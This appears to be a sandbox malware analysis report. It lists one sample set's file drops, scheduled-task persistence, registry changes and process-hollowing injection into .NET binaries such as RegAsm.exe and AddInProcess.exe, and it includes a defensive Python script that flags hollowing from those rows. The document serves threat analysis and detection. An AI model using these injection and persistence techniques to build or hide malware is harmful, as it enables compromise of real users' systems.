Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6980 set thread context of 7128 N/A C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6712 set thread context of 2296 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7468 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 6824 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7344 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7156 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7668 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7888 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 8148 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 6832 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 2112 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 1156 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7432 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 3296 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7072 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
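The SetThreadContext rows above show two injectors: deepweb.exe writing a thread context into RegAsm.exe once, and pureee.exe doing the same into fourteen separate AddInProcess.exe instances. Both targets are signed Microsoft .NET binaries that loaders commonly start suspended and overwrite (process hollowing, ATT&CK T1055.012). The script below is an added example, not code from the report or from the malware families it names: it parses the rows in the report's layout, groups them by injecting PID, and flags both the hollowing pattern and the repeated re-injection that fourteen targets from one source implies. The sample rows are constructed from the table above (three of the pureee.exe rows are enough to show the pattern); the DOTNET_HOSTS list and the re-injection threshold are the author's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample rows in the report's layout for this signature:
# "PID <src> set thread context of <dst> N/A <source image> <target image>".
SAMPLE_ROWS = r"""
PID 6980 set thread context of 7128 N/A C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6712 set thread context of 2296 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7468 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 6824 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"""

# Source image is matched lazily up to the next " X:\" so paths with spaces still split.
ROW_RE = re.compile(
    r"^PID (\d+) set thread context of (\d+)\s+N/A\s+([A-Za-z]:\\.+?)\s+([A-Za-z]:\\.+)$"
)

# Signed Microsoft .NET binaries that loaders routinely spawn suspended and overwrite.
# Assumed list for this example; extend it to match your own telemetry.
DOTNET_HOSTS = {
    "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
    "addinprocess.exe", "addinprocess32.exe", "applaunch.exe", "csc.exe", "vbc.exe",
}

def parse_rows(text):
    """(source_pid, target_pid, source_image, target_image) per matching row."""
    out = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            out.append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return out

def basename(path):
    return path.rsplit("\\", 1)[-1]

def summarize(events, reinject_threshold=3):
    """Group SetThreadContext calls by injecting PID and flag hollowing patterns."""
    by_src = defaultdict(lambda: {"image": None, "targets": [], "hosts": set()})
    for src, dst, src_img, dst_img in events:
        rec = by_src[src]
        rec["image"] = basename(src_img)
        rec["targets"].append(dst)
        rec["hosts"].add(basename(dst_img))
    summary = {}
    for src, rec in by_src.items():
        hosts = sorted(rec["hosts"])
        summary[src] = {
            "image": rec["image"],
            "targets": len(rec["targets"]),
            "hosts": hosts,
            # thread context rewritten in a known .NET host: classic hollowing (T1055.012)
            "hollowing_suspected": any(h.lower() in DOTNET_HOSTS for h in hosts),
            # one injector, many fresh targets: the payload was re-launched repeatedly
            "repeated_injection": len(rec["targets"]) >= reinject_threshold,
        }
    return summary

if __name__ == "__main__":
    for src, rec in summarize(parse_rows(SAMPLE_ROWS)).items():
        print(src, rec["image"], "->", rec["hosts"], rec["targets"], "target(s)",
              "HOLLOWING" if rec["hollowing_suspected"] else "",
              "REPEATED" if rec["repeated_injection"] else "")
```

For detection engineering the useful pairing is the source image location plus the target image name: a process running from %TEMP% calling SetThreadContext on a freshly created RegAsm.exe or AddInProcess.exe is the event to alert on, and the repeated-injection flag separates a single hollowed host from the fourteen-instance loop seen here without having to assert why the loop happened.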

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\cookielib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\command\bdist_wininst.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Mariehamn C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xmllib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\cachecontrol\wrapper.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\Mendoza C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Metlakatla C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Antarctica\McMurdo C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Hebron C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Etc\GMT+4 C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\dumbdbm.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\nl.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Fakaofo C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\ctypes\macholib\framework.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\fixes\fix_reduce.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\Grammar.txt C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Brazzaville C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\widget C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\comdlg.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\smtplib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\distlib\database.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\_implementation.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pkgIndex.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\Shell.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\_markerlib C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-highlight.def C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\ttk\combobox.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\toolbar.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\launcher manifest.xml C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Indiana\Vincennes C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\aniwave.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\plot.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kok_in.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\CObjView.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\rcvirtualprintdriver.cat C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-keys.def C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\sanitizer.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\ComodRivadavia C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Grand_Turk C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\samples\Control.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\archive_util.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\mailcap.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\cp949prober.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kw.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Belgrade C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xml\sax\expatreader.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\bsddb\dbrecio.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip-7.1.2.dist-info\WHEEL C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\ui.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\sunaudio.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Galapagos C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pref\TK.csc C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Samarkand C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\packaging\_compat.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\__main__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\encoding\cp737.enc C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\ro.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Cayman C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\tixwidgets.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIE9BA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEC3F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF17F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59e72c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e59e72a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{373FFE70-5FF7-492D-A2F4-0C6A15D8D503} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\Installer\MSIF1FD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB55.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI26B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59e72a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
File opened for modification C:\Windows\Installer\MSIEA09.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEB91.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEBFF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\1000029002\84743dcfde.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\84743dcfde.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\xpmvhsd\agpphek.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30\DefaultFeature C:\Windows\system32\msiexec.exe N/A
